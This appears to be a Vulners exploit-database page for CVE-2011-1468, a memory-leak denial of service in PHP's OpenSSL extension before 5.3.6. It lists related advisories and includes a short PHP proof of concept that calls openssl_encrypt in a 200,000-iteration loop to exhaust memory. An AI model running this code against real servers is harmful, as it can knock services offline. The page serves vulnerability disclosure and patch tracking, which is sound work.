PHP 5.3.6 'OpenSSL' Extension - 'openssl_encrypt' Memory Leak Do
Reporter | Title | Published | Views | Family All 65 |
---|---|---|---|---|
Veracode | Denial Of Service (DoS) | 10 Apr 202001:03 | β | veracode |
seebug.org | PHP "OpenSSL"ζ©ε±ε€δΈͺζη»ζε‘ζΌζ΄ | 27 Mar 201100:00 | β | seebug |
UbuntuCve | CVE-2011-1468 | 19 Mar 201100:00 | β | ubuntucve |
CVE | CVE-2011-1468 | 20 Mar 201102:00 | β | cve |
Prion | Design/Logic Flaw | 20 Mar 201102:00 | β | prion |
NVD | CVE-2011-1468 | 20 Mar 201102:00 | β | nvd |
Cvelist | CVE-2011-1468 | 20 Mar 201101:00 | β | cvelist |
Exploit DB | PHP < 5.3.6 'OpenSSL' Extension - 'openssl_decrypt' Ciphertext Data Memory Leak Denial of Service | 8 Mar 201100:00 | β | exploitdb |
OpenVAS | RedHat Update for php53 and php RHSA-2011:1423-01 | 3 Nov 201100:00 | β | openvas |
OpenVAS | CentOS Update for php53 CESA-2011:1423 centos5 i386 | 3 Nov 201100:00 | β | openvas |
source: https://www.securityfocus.com/bid/46977/info
PHP is prone to multiple remote denial-of-service vulnerabilities that affect the 'OpenSSL' extension.
Successful attacks will cause the application to consume excessive memory, creating a denial-of-service condition.
Versions prior to PHP 5.3.6 are vulnerable.
<?php
$data = "jfdslkjvflsdkjvlkfjvlkjfvlkdm,4w 043920r 9234r 32904r 09243 r7-89437 r892374 r894372 r894 7289r7 f frwerfh i iurf iuryw uyrfouiwy ruy 972439 8478942 yrhfjkdhls";
$pass = "r23498rui324hjbnkj";
$maxi = 200000;
$t = microtime(1);
for ($i=0;$i<$maxi; $i++){
openssl_encrypt($data.$i, 'des3', $pass, false, '1qazxsw2');
}
$t = microtime(1)-$t;
print "mode: openssl_encrypt ($maxi) tests takes ".$t."secs ".($maxi/$t)."#/sec \n";
?>
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo